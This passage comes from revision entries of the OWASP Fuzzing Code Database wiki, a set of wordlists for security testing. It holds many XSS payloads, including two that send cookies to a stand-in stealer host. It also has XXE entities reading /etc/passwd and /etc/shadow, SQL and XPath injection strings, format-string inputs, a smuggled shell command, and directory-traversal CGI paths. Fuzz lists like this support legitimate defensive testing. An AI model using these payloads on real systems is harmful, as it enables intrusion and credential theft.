&amp;quot;&amp;amp;lt;div style=&amp;quot;&amp;quot;binding: url([link to code]);&amp;quot;&amp;quot;&amp;amp;gt; [Mozilla]&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;!-- -- --&amp;amp;gt;&amp;amp;lt;script&amp;amp;gt;document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;);&amp;amp;lt;/script&amp;amp;gt;&amp;amp;lt;!-- -- --&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;xml src=&amp;quot;&amp;quot;javascript:document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;);&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;xml id=&amp;quot;&amp;quot;X&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;a&amp;amp;gt;&amp;amp;lt;b&amp;amp;gt;&amp;amp;lt;script&amp;amp;gt;document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;);&amp;amp;lt;/script&amp;amp;gt;;&amp;amp;lt;/b&amp;amp;gt;&amp;amp;lt;/a&amp;amp;gt;&amp;amp;lt;/xml&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;[\xC0][\xBC]script&amp;amp;gt;document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;);[\xC0][\xBC]/script&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;amp;gt;&amp;amp;lt;script&amp;amp;gt;&lt;br /&gt;
&amp;quot;&amp;amp;lt;script&amp;amp;gt;alert(&amp;quot;&amp;quot;WXSS&amp;quot;&amp;quot;)&amp;amp;lt;/script&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;&amp;amp;lt;script&amp;amp;gt;alert(&amp;quot;&amp;quot;WXSS&amp;quot;&amp;quot;);//&amp;amp;lt;&amp;amp;lt;/script&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;amp;lt;script&amp;amp;gt;alert(document.cookie)&amp;amp;lt;/script&amp;amp;gt;&lt;br /&gt;
'&amp;amp;gt;&amp;amp;lt;script&amp;amp;gt;alert(document.cookie)&amp;amp;lt;/script&amp;amp;gt;&lt;br /&gt;
'&amp;amp;gt;&amp;amp;lt;script&amp;amp;gt;alert(document.cookie);&amp;amp;lt;/script&amp;amp;gt;&lt;br /&gt;
&amp;quot;%3cscript%3ealert(&amp;quot;&amp;quot;WXSS&amp;quot;&amp;quot;);%3c/script%3e&amp;quot;&lt;br /&gt;
%3cscript%3ealert(document.cookie);%3c%2fscript%3e&lt;br /&gt;
%3Cscript%3Ealert(%22X%20SS%22);%3C/script%3E&lt;br /&gt;
&amp;amp;amp;ltscript&amp;amp;amp;gtalert(document.cookie);&amp;amp;lt;/script&amp;amp;gt;&lt;br /&gt;
&amp;amp;amp;ltscript&amp;amp;amp;gtalert(document.cookie);&amp;amp;amp;ltscript&amp;amp;amp;gtalert&lt;br /&gt;
&amp;amp;lt;xss&amp;amp;gt;&amp;amp;lt;script&amp;amp;gt;alert('WXSS')&amp;amp;lt;/script&amp;amp;gt;&amp;amp;lt;/vulnerable&amp;amp;gt;&lt;br /&gt;
&amp;amp;lt;IMG%20SRC='javascript:alert(document.cookie)'&amp;amp;gt;&lt;br /&gt;
&amp;quot;&amp;amp;lt;IMG%20SRC=&amp;quot;&amp;quot;javascript:alert('WXSS');&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;IMG%20SRC=&amp;quot;&amp;quot;javascript:alert('WXSS')&amp;quot;&amp;quot;&amp;quot;&lt;br /&gt;
&amp;amp;lt;IMG%20SRC=JaVaScRiPt:alert('WXSS')&amp;amp;gt;&lt;br /&gt;
&amp;amp;lt;IMG%20SRC=javascript:alert(&amp;quot;WXSS&amp;quot;)&amp;amp;gt;&lt;br /&gt;
&amp;quot;&amp;amp;lt;IMG%20SRC=`javascript:alert(&amp;quot;&amp;quot;'WXSS'&amp;quot;&amp;quot;)`&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;IMG%20&amp;quot;&amp;quot;&amp;quot;&amp;quot;&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;SCRIPT&amp;amp;gt;alert(&amp;quot;&amp;quot;WXSS&amp;quot;&amp;quot;)&amp;amp;lt;/SCRIPT&amp;amp;gt;&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;amp;lt;IMG%20SRC=javascript:alert(String.fromCharCode(88,83,83))&amp;amp;gt;&lt;br /&gt;
&amp;amp;lt;IMG%20SRC='javasc&lt;br /&gt;
&amp;quot;&amp;amp;lt;IMG%20SRC=&amp;quot;&amp;quot;jav&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;IMG%20SRC=&amp;quot;&amp;quot;jav	ascript:alert('WXSS');&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;IMG%20SRC=&amp;quot;&amp;quot;jav&lt;br /&gt;
ascript:alert('WXSS');&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;IMG%20SRC=&amp;quot;&amp;quot;jav&lt;br /&gt;
ascript:alert('WXSS');&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;IMG%20SRC=&amp;quot;&amp;quot;%20&amp;amp;amp;#14;%20javascript:alert('WXSS');&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;IMG%20DYNSRC=&amp;quot;&amp;quot;javascript:alert('WXSS')&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;IMG%20LOWSRC=&amp;quot;&amp;quot;javascript:alert('WXSS')&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;amp;lt;IMG%20SRC='%26%23x6a;avasc%26%23000010ript:a%26%23x6c;ert(document.%26%23x63;ookie)'&amp;amp;gt;&lt;br /&gt;
&amp;amp;lt;IMG%20SRC=javascript:alert('XSS')&amp;amp;gt;&lt;br /&gt;
&amp;amp;lt;IMG%20SRC=&amp;amp;amp;#0000106&amp;amp;amp;#0000097&amp;amp;amp;#0000118&amp;amp;amp;#0000097&amp;amp;amp;#0000115&amp;amp;amp;#0000099&amp;amp;amp;#0000114&amp;amp;amp;#0000105&amp;amp;amp;#0000112&amp;amp;amp;#0000116&amp;amp;amp;#0000058&amp;amp;amp;#0000097&amp;amp;amp;#0000108&amp;amp;amp;#0000101&amp;amp;amp;#0000114&amp;amp;amp;#0000116&amp;amp;amp;#0000040&amp;amp;amp;#0000039&amp;amp;amp;#0000088&amp;amp;amp;#0000083&amp;amp;amp;#0000083&amp;amp;amp;#0000039&amp;amp;amp;#0000041&amp;amp;gt;&lt;br /&gt;
&amp;amp;lt;IMG%20SRC=&amp;amp;amp;#x6A&amp;amp;amp;#x61&amp;amp;amp;#x76&amp;amp;amp;#x61&amp;amp;amp;#x73&amp;amp;amp;#x63&amp;amp;amp;#x72&amp;amp;amp;#x69&amp;amp;amp;#x70&amp;amp;amp;#x74&amp;amp;amp;#x3A&amp;amp;amp;#x61&amp;amp;amp;#x6C&amp;amp;amp;#x65&amp;amp;amp;#x72&amp;amp;amp;#x74&amp;amp;amp;#x28&amp;amp;amp;#x27&amp;amp;amp;#x58&amp;amp;amp;#x53&amp;amp;amp;#x53&amp;amp;amp;#x27&amp;amp;amp;#x29&amp;amp;gt;&lt;br /&gt;
'%3CIFRAME%20SRC=javascript:alert(%2527XSS%2527)%3E%3C/IFRAME%3E&lt;br /&gt;
&amp;quot;&amp;amp;gt;&amp;amp;lt;script&amp;amp;gt;document.location='http://cookieStealer/cgi-bin/cookie.cgi?'+document.cookie&amp;amp;lt;/script&amp;amp;gt;&lt;br /&gt;
%22%3E%3Cscript%3Edocument%2Elocation%3D%27http%3A%2F%2Fyour%2Esite%2Ecom%2Fcgi%2Dbin%2Fcookie%2Ecgi%3F%27%20%2Bdocument%2Ecookie%3C%2Fscript%3E&lt;br /&gt;
';alert(String.fromCharCode(88,83,83))//\';alert(String.fromCharCode(88,83,83))//;alert(String.fromCharCode(88,83,83))//\;alert(String.fromCharCode(88,83,83))//&amp;amp;gt;&amp;amp;lt;/SCRIPT&amp;amp;gt;!--&amp;amp;lt;SCRIPT&amp;amp;gt;alert(String.fromCharCode(88,83,83))&amp;amp;lt;/SCRIPT&amp;amp;gt;=&amp;amp;amp;{}&lt;br /&gt;
'';!--&amp;amp;lt;XSS&amp;amp;gt;=&amp;amp;amp;{()}&amp;quot;&lt;br /&gt;
&amp;lt;/pre&amp;gt; &lt;br /&gt;
&amp;lt;br&amp;gt; &lt;br /&gt;
&lt;br /&gt;
=== XML Attacks - (Update: 11 August 2009 - Total Statements: 15)  ===&lt;br /&gt;
&amp;lt;pre&amp;gt;Statements&lt;br /&gt;
count(/child::node())&lt;br /&gt;
x' or name()='username' or 'x'='y&lt;br /&gt;
&amp;amp;lt;name&amp;amp;gt;','')); phpinfo(); exit;/*&amp;amp;lt;/name&amp;amp;gt;&lt;br /&gt;
&amp;amp;lt;![CDATA[&amp;amp;lt;script&amp;amp;gt;var n=0;while(true){n++;}&amp;amp;lt;/script&amp;amp;gt;]]&amp;amp;gt;&lt;br /&gt;
&amp;amp;lt;![CDATA[&amp;amp;lt;]]&amp;amp;gt;SCRIPT&amp;amp;lt;![CDATA[&amp;amp;gt;]]&amp;amp;gt;alert('XSS');&amp;amp;lt;![CDATA[&amp;amp;lt;]]&amp;amp;gt;/SCRIPT&amp;amp;lt;![CDATA[&amp;amp;gt;]]&amp;amp;gt;&lt;br /&gt;
&amp;quot;&amp;amp;lt;?xml version=&amp;quot;&amp;quot;1.0&amp;quot;&amp;quot; encoding=&amp;quot;&amp;quot;ISO-8859-1&amp;quot;&amp;quot;?&amp;amp;gt;&amp;amp;lt;foo&amp;amp;gt;&amp;amp;lt;![CDATA[&amp;amp;lt;]]&amp;amp;gt;SCRIPT&amp;amp;lt;![CDATA[&amp;amp;gt;]]&amp;amp;gt;alert('XSS');&amp;amp;lt;![CDATA[&amp;amp;lt;]]&amp;amp;gt;/SCRIPT&amp;amp;lt;![CDATA[&amp;amp;gt;]]&amp;amp;gt;&amp;amp;lt;/foo&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;?xml version=&amp;quot;&amp;quot;1.0&amp;quot;&amp;quot; encoding=&amp;quot;&amp;quot;ISO-8859-1&amp;quot;&amp;quot;?&amp;amp;gt;&amp;amp;lt;foo&amp;amp;gt;&amp;amp;lt;![CDATA[' or 1=1 or ''=']]&amp;amp;gt;&amp;amp;lt;/foo&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;?xml version=&amp;quot;&amp;quot;1.0&amp;quot;&amp;quot; encoding=&amp;quot;&amp;quot;ISO-8859-1&amp;quot;&amp;quot;?&amp;amp;gt;&amp;amp;lt;!DOCTYPE foo [&amp;amp;lt;!ELEMENT foo ANY&amp;amp;gt;&amp;amp;lt;!ENTITY xxe SYSTEM &amp;quot;&amp;quot;file://c:/boot.ini&amp;quot;&amp;quot;&amp;amp;gt;]&amp;amp;gt;&amp;amp;lt;foo&amp;amp;gt;&amp;amp;amp;xxe;&amp;amp;lt;/foo&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;?xml version=&amp;quot;&amp;quot;1.0&amp;quot;&amp;quot; encoding=&amp;quot;&amp;quot;ISO-8859-1&amp;quot;&amp;quot;?&amp;amp;gt;&amp;amp;lt;!DOCTYPE foo [&amp;amp;lt;!ELEMENT foo ANY&amp;amp;gt;&amp;amp;lt;!ENTITY xxe SYSTEM &amp;quot;&amp;quot;file:////etc/passwd&amp;quot;&amp;quot;&amp;amp;gt;]&amp;amp;gt;&amp;amp;lt;foo&amp;amp;gt;&amp;amp;amp;xxe;&amp;amp;lt;/foo&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;?xml version=&amp;quot;&amp;quot;1.0&amp;quot;&amp;quot; encoding=&amp;quot;&amp;quot;ISO-8859-1&amp;quot;&amp;quot;?&amp;amp;gt;&amp;amp;lt;!DOCTYPE foo [&amp;amp;lt;!ELEMENT foo ANY&amp;amp;gt;&amp;amp;lt;!ENTITY xxe SYSTEM &amp;quot;&amp;quot;file:////etc/shadow&amp;quot;&amp;quot;&amp;amp;gt;]&amp;amp;gt;&amp;amp;lt;foo&amp;amp;gt;&amp;amp;amp;xxe;&amp;amp;lt;/foo&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;?xml version=&amp;quot;&amp;quot;1.0&amp;quot;&amp;quot; encoding=&amp;quot;&amp;quot;ISO-8859-1&amp;quot;&amp;quot;?&amp;amp;gt;&amp;amp;lt;!DOCTYPE foo [&amp;amp;lt;!ELEMENT foo ANY&amp;amp;gt;&amp;amp;lt;!ENTITY xxe SYSTEM &amp;quot;&amp;quot;file:////dev/random&amp;quot;&amp;quot;&amp;amp;gt;]&amp;amp;gt;&amp;amp;lt;foo&amp;amp;gt;&amp;amp;amp;xxe;&amp;amp;lt;/foo&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;xml ID=I&amp;amp;gt;&amp;amp;lt;X&amp;amp;gt;&amp;amp;lt;C&amp;amp;gt;&amp;amp;lt;![CDATA[&amp;amp;lt;IMG SRC=&amp;quot;&amp;quot;javas]]&amp;amp;gt;&amp;amp;lt;![CDATA[cript:alert('XSS');&amp;quot;&amp;quot;&amp;amp;gt;]]&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;xml ID=&amp;quot;&amp;quot;xss&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;I&amp;amp;gt;&amp;amp;lt;B&amp;amp;gt;&amp;amp;lt;IMG SRC=&amp;quot;&amp;quot;javas&amp;amp;lt;!-- --&amp;amp;gt;cript:alert('XSS')&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;/B&amp;amp;gt;&amp;amp;lt;/I&amp;amp;gt;&amp;amp;lt;/xml&amp;amp;gt;&amp;amp;lt;SPAN DATASRC=&amp;quot;&amp;quot;#xss&amp;quot;&amp;quot; DATAFLD=&amp;quot;&amp;quot;B&amp;quot;&amp;quot; DATAFORMATAS=&amp;quot;&amp;quot;HTML&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;/SPAN&amp;amp;gt;&amp;amp;lt;/C&amp;amp;gt;&amp;amp;lt;/X&amp;amp;gt;&amp;amp;lt;/xml&amp;amp;gt;&amp;amp;lt;SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML&amp;amp;gt;&amp;amp;lt;/SPAN&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;xml SRC=&amp;quot;&amp;quot;xsstest.xml&amp;quot;&amp;quot; ID=I&amp;amp;gt;&amp;amp;lt;/xml&amp;amp;gt;&amp;amp;lt;SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML&amp;amp;gt;&amp;amp;lt;/SPAN&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;HTML xmlns:xss&amp;amp;gt;&amp;amp;lt;?import namespace=&amp;quot;&amp;quot;xss&amp;quot;&amp;quot; implementation=&amp;quot;&amp;quot;http://ha.ckers.org/xss.htc&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;xss:xss&amp;amp;gt;XSS&amp;amp;lt;/xss:xss&amp;amp;gt;&amp;amp;lt;/HTML&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;lt;/pre&amp;gt; &lt;br /&gt;
=== Format String Statements - (Update: xx/xx/xx - Total Statements: 28) ===&lt;br /&gt;
&amp;lt;pre&amp;gt;%s%p%x%d&lt;br /&gt;
.1024d&lt;br /&gt;
%.2049d&lt;br /&gt;
%p%p%p%p&lt;br /&gt;
%x%x%x%x&lt;br /&gt;
%d%d%d%d&lt;br /&gt;
%s%s%s%s&lt;br /&gt;
%99999999999s&lt;br /&gt;
%08x&lt;br /&gt;
%%20d&lt;br /&gt;
%%20n&lt;br /&gt;
%%20x&lt;br /&gt;
%%20s&lt;br /&gt;
%s%s%s%s%s%s%s%s%s%s&lt;br /&gt;
%p%p%p%p%p%p%p%p%p%p&lt;br /&gt;
%#0123456x%08x%x%s%p%d%n%o%u%c%h%l%q%j%z%Z%t%i%e%g%f%a%C%S%08x%%&lt;br /&gt;
f(x)=%s x 123&lt;br /&gt;
f(x)=%x x 255&lt;br /&gt;
%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x&lt;br /&gt;
%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s&lt;br /&gt;
XXXXX.%p&lt;br /&gt;
XXXXX`perl -e 'print &amp;quot;.%p&amp;quot; x 80'`&lt;br /&gt;
`perl -e 'print &amp;quot;.%p&amp;quot; x 80'`%n&lt;br /&gt;
%08x.%08x.%08x.%08x.%08x\n&lt;br /&gt;
XXX0_%08x.%08x.%08x.%08x.%08x\n&lt;br /&gt;
%.16705u%2\$hn&lt;br /&gt;
\x10\x01\x48\x08_%08x.%08x.%08x.%08x.%08x|%s|&lt;br /&gt;
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;id &amp;amp;gt; /tmp/file; exit;&lt;br /&gt;
&amp;lt;/pre&amp;gt; &lt;br /&gt;
==== Project Contributor  ====&lt;br /&gt;
&lt;br /&gt;
Project Leader: [[:User:Wagner.elias|'''Wagner Elias''']] &lt;br /&gt;
&lt;br /&gt;
Reviewer: [[:User:eneves|'''Eduardo Neves''']] &lt;br /&gt;
&lt;br /&gt;
Contributor: [[:User:ulisses.castro|'''Ulisses Castro''']] &lt;br /&gt;
&lt;br /&gt;
==== Feedback and Participation  ====&lt;br /&gt;
&lt;br /&gt;
We hope you find the Fuzzing Code Database useful. Please contribute to the Project by volunteering for one of the tasks, sending your comments, questions, and suggestions to wagner.elias |at| owasp.org &lt;br /&gt;
&lt;br /&gt;
==== Project Identification  ====&lt;br /&gt;
&lt;br /&gt;
{{Template:OWASP Project Identification Tab&lt;br /&gt;
| project_name = OWASP Fuzzing Code Database&lt;br /&gt;
| project_description = &lt;br /&gt;
| leader_name = Wagner Elias&lt;br /&gt;
| leader_email = &lt;br /&gt;
| leader_username = Wagner.elias&lt;br /&gt;
| maintainer_name = &lt;br /&gt;
| maintainer_email = &lt;br /&gt;
| maintainer_username = &lt;br /&gt;
| contributor_name1 = &lt;br /&gt;
| contributor_email1 = &lt;br /&gt;
| contributor_username1 = &lt;br /&gt;
| contributor_name2 = &lt;br /&gt;
| contributor_email2 = &lt;br /&gt;
| contributor_username2 = &lt;br /&gt;
| contributor_name3 = &lt;br /&gt;
| contributor_email3 = &lt;br /&gt;
| contributor_username3 = &lt;br /&gt;
| contributor_name4 = &lt;br /&gt;
| contributor_email4 = &lt;br /&gt;
| contributor_username4 = &lt;br /&gt;
| contributor_name5 = &lt;br /&gt;
| contributor_email5 = &lt;br /&gt;
| contributor_username5 = &lt;br /&gt;
| contributor_name6 = &lt;br /&gt;
| contributor_email6 = &lt;br /&gt;
| contributor_username6 = &lt;br /&gt;
| contributor_name7 = &lt;br /&gt;
| contributor_email7 = &lt;br /&gt;
| contributor_username7 = &lt;br /&gt;
| contributor_name8 = &lt;br /&gt;
| contributor_email8 = &lt;br /&gt;
| contributor_username8 = &lt;br /&gt;
| contributor_name9 = &lt;br /&gt;
| contributor_email9 = &lt;br /&gt;
| contributor_username9 = &lt;br /&gt;
| contributor_name10 = &lt;br /&gt;
| contributor_email10 = &lt;br /&gt;
| contributor_username10 =  &lt;br /&gt;
| pamphlet_link = &lt;br /&gt;
| mailing_list_name = owasp-fuzzing-code-database&lt;br /&gt;
| links_url1 = &lt;br /&gt;
| links_name1 = &lt;br /&gt;
| links_url2 = &lt;br /&gt;
| links_name2 = &lt;br /&gt;
| links_url3 = &lt;br /&gt;
| links_name3 = &lt;br /&gt;
| links_url4 = &lt;br /&gt;
| links_name4 = &lt;br /&gt;
| links_url5 = &lt;br /&gt;
| links_name5 = &lt;br /&gt;
| links_url6 = &lt;br /&gt;
| links_name6 = &lt;br /&gt;
| links_url7 = &lt;br /&gt;
| links_name7 = &lt;br /&gt;
| links_url8 = &lt;br /&gt;
| links_name8 = &lt;br /&gt;
| links_url9 = &lt;br /&gt;
| links_name9 = &lt;br /&gt;
| links_url10 = &lt;br /&gt;
| links_name10 = &lt;br /&gt;
| project_road_map =&lt;br /&gt;
| project_health_status = &lt;br /&gt;
| current_release_name = &lt;br /&gt;
| current_release_date = &lt;br /&gt;
| current_release_download_link = &lt;br /&gt;
| current_release_rating = &lt;br /&gt;
| current_release_leader_name = &lt;br /&gt;
| current_release_leader_email = &lt;br /&gt;
| current_release_leader_username = &lt;br /&gt;
| last_reviewed_release_name = &lt;br /&gt;
| last_reviewed_release_date = &lt;br /&gt;
| last_reviewed_release_download_link = &lt;br /&gt;
| last_reviewed_release_rating = &lt;br /&gt;
| last_reviewed_release_leader_name = &lt;br /&gt;
| last_reviewed_release_leader_email = &lt;br /&gt;
| last_reviewed_release_leader_username = &lt;br /&gt;
| old_release_name1 = &lt;br /&gt;
| old_release_date1 = &lt;br /&gt;
| old_release_download_link1 = &lt;br /&gt;
| old_release_name2 = &lt;br /&gt;
| old_release_date2 = &lt;br /&gt;
| old_release_download_link2 = &lt;br /&gt;
| old_release_name3 = &lt;br /&gt;
| old_release_date3 = &lt;br /&gt;
| old_release_download_link3 = &lt;br /&gt;
| old_release_name4 = &lt;br /&gt;
| old_release_date4 = &lt;br /&gt;
| old_release_download_link4 = &lt;br /&gt;
| old_release_name5 = &lt;br /&gt;
| old_release_date5 = &lt;br /&gt;
| old_release_download_link5 = &lt;br /&gt;
}} __NOTOC__ &amp;lt;headertabs /&amp;gt; &lt;br /&gt;
&lt;br /&gt;
[[Category:OWASP_Project|Fuzzing Code Database]] [[Category:OWASP_Document]] [[Category:OWASP_Alpha_Quality_Document]]&lt;/div&gt;</summary>
		<author><name>Adam.muntner</name></author>	</entry>

	<entry>
		<id>https://wiki.owasp.org/index.php?title=Category:OWASP_Fuzzing_Code_Database&amp;diff=80078</id>
		<title>Category:OWASP Fuzzing Code Database</title>
		<link rel="alternate" type="text/html" href="https://wiki.owasp.org/index.php?title=Category:OWASP_Fuzzing_Code_Database&amp;diff=80078"/>
				<updated>2010-03-17T21:11:28Z</updated>
		
		<summary type="html">&lt;p&gt;Adam.muntner: /* Common Windows CGI   (Update: 17 March 2009) */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;This database is a collection of several statements used in code injection, fuzzing and brute-force aproach. All too often security professionals rely on their own repositories of statements collected from assessments they've conducted. These repositories are prone to being incomplete or outdated. We want to collect all these statements, merging the statements from several projects like [[WebScarab]], [[WebSlayer]] and [[JBroFuzz]] with member contributions to build a comprehensive dataset of effective statements to provide better testing results. Please add your own statements and check out the statements already added. &lt;br /&gt;
&lt;br /&gt;
==== News  ====&lt;br /&gt;
&lt;br /&gt;
'''02 February 2010'''' &lt;br /&gt;
&lt;br /&gt;
*Created new Category Lotus/Notes Files&lt;br /&gt;
&lt;br /&gt;
'''11 August 2009''' &lt;br /&gt;
&lt;br /&gt;
*Created new Category: XML Attacks&lt;br /&gt;
&lt;br /&gt;
''Update Statements'' &lt;br /&gt;
&lt;br /&gt;
*15 new XML Statements &lt;br /&gt;
*93 new SQL Injections Statements &lt;br /&gt;
*67 new Traversal Directory Statements &lt;br /&gt;
*Delete 33 XSS Statement Duplicate &lt;br /&gt;
*30 New XSS Statements&lt;br /&gt;
&lt;br /&gt;
'''7 August 2009''' &lt;br /&gt;
&lt;br /&gt;
*Updated the objectives of the project.&lt;br /&gt;
&lt;br /&gt;
'''21 July 2009''' &lt;br /&gt;
&lt;br /&gt;
*Set the team responsible for the project.&lt;br /&gt;
&lt;br /&gt;
==== Goals  ====&lt;br /&gt;
&lt;br /&gt;
This project intend to create a database that concentrate all tools which are based on wordlists such as Webscarab, JBroFuzz, Web Slayer , Dirbuster. and others. In addition to current tools developed by OWASP members we will create a database following a style similar to Open Vulnerability and Assessment Language (OVAL) where any tool can adopt and use a XML file maintained by OWASP. &lt;br /&gt;
&lt;br /&gt;
In addition, the following functionalities will be included on this project: &lt;br /&gt;
&lt;br /&gt;
1 - The statements of ASDR Project 2 - Browser 3 - Operational System 4 - Databases &lt;br /&gt;
&lt;br /&gt;
An URL will also be published to create an collaborative environment for the maintenance process where the following features are planned: &lt;br /&gt;
&lt;br /&gt;
1 - Deploy a process where a new statement can be suggested and registered if is not valid yet and not maintained in other database. &lt;br /&gt;
&lt;br /&gt;
2 - A list where besides the statement, a single id will be maintained to identify each statement with a description and the results of the exploitation. &lt;br /&gt;
&lt;br /&gt;
3 - Possibility to support users on the report of their own experiences with the statements. &lt;br /&gt;
&lt;br /&gt;
==== Statements  ====&lt;br /&gt;
&lt;br /&gt;
=== Vulnerable Cross-Platform CGI (17 March 2010) ===&lt;br /&gt;
&amp;lt;pre&amp;gt;# Vulnerable Cross-Platform CGI (17 March 2010) &lt;br /&gt;
# fuzz inside cgi directories&lt;br /&gt;
# on windows, this is usually /scripts or /bin or /cgi-bin, on unix, usually /cgi-bin, /nph-cgi&lt;br /&gt;
# adam.muntner@quietmove.com&lt;br /&gt;
&lt;br /&gt;
%2e%2e/abyss.conf&lt;br /&gt;
.access&lt;br /&gt;
.cobalt&lt;br /&gt;
.cobalt/alert/service.cgi?service=&amp;lt;img%20src=javascript:alert('XSS')&amp;gt;&lt;br /&gt;
.cobalt/alert/service.cgi?service=&amp;lt;script&amp;gt;alert('XSS')&amp;lt;/script&amp;gt;&lt;br /&gt;
.fhp&lt;br /&gt;
.htaccess&lt;br /&gt;
.htaccess.old&lt;br /&gt;
.htaccess.save&lt;br /&gt;
.htaccess~&lt;br /&gt;
.htpasswd&lt;br /&gt;
.nsconfig&lt;br /&gt;
.passwd&lt;br /&gt;
.www_acl&lt;br /&gt;
.wwwacl&lt;br /&gt;
/_vti_pvt/doctodep.btr&lt;br /&gt;
14all-1.1.cgi?cfg=../../../../../../../..{KNOWNFILE}&lt;br /&gt;
14all.cgi?cfg=../../../../../../../..{KNOWNFILE}&lt;br /&gt;
AT-admin.cgi&lt;br /&gt;
AT-generate.cgi&lt;br /&gt;
Album?mode=album&amp;amp;album=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc&amp;amp;dispsize=640&amp;amp;start=0&lt;br /&gt;
AnyBoard.cgi&lt;br /&gt;
AnyForm&lt;br /&gt;
AnyForm2&lt;br /&gt;
Backup/add-passwd.cgi&lt;br /&gt;
C&lt;br /&gt;
Count.cgi&lt;br /&gt;
DC&lt;br /&gt;
DCFORM&lt;br /&gt;
File&lt;br /&gt;
FormHandler.cgi?realname=aaa&amp;amp;email=aaa&amp;amp;reply_message_template=%2Fetc%2Fpasswd&amp;amp;reply_message_from=sq%40example.com&amp;amp;redirect=http%3A%2F%2Fwww.example.com&amp;amp;recipient=sq%40example.com&lt;br /&gt;
FormMail.cgi?&amp;lt;script&amp;gt;alert(\&lt;br /&gt;
FormMail.pl&lt;br /&gt;
ImageFolio/admin/admin.cgi&lt;br /&gt;
LWGate&lt;br /&gt;
LWGate.cgi&lt;br /&gt;
Upload.pl&lt;br /&gt;
Vs&lt;br /&gt;
W&lt;br /&gt;
YaBB.pl?board=news&amp;amp;action=display&amp;amp;num=../../../../../../../../../..{KNOWNFILE}%00&lt;br /&gt;
YaBB/YaBB.cgi?board=BOARD&amp;amp;action=display&amp;amp;num=&amp;lt;script&amp;gt;alert('XSS')&amp;lt;/script&amp;gt;&lt;br /&gt;
a1disp3.cgi?../../../../../../../../../..{KNOWNFILE}&lt;br /&gt;
a1stats/a1disp3.cgi?../../../../../../../../../..{KNOWNFILE}&lt;br /&gt;
a1stats/a1disp3.cgi?../../../../../../..{KNOWNFILE}&lt;br /&gt;
a1stats/a1disp4.cgi?../../../../../../..{KNOWNFILE}&lt;br /&gt;
add_ftp.cgi&lt;br /&gt;
addbanner.cgi&lt;br /&gt;
adduser.cgi&lt;br /&gt;
admin.cgi&lt;br /&gt;
admin.cgi?list=../../../../../../../../../..{KNOWNFILE}&lt;br /&gt;
admin.php&lt;br /&gt;
admin.php3&lt;br /&gt;
admin.pl&lt;br /&gt;
adminhot.cgi&lt;br /&gt;
adminwww.cgi&lt;br /&gt;
af.cgi?_browser_out=.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2Fetc%2Fpasswd&lt;br /&gt;
aglimpse&lt;br /&gt;
aglimpse.cgi&lt;br /&gt;
alibaba.pl|dir%20..\\..\\..\\..\\..\\..\\..\\,&lt;br /&gt;
alienform.cgi?_browser_out=.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2Fetc%2Fpasswd&lt;br /&gt;
amadmin.pl&lt;br /&gt;
anacondaclip.pl?template=../../../../../../../../../..{KNOWNFILE}&lt;br /&gt;
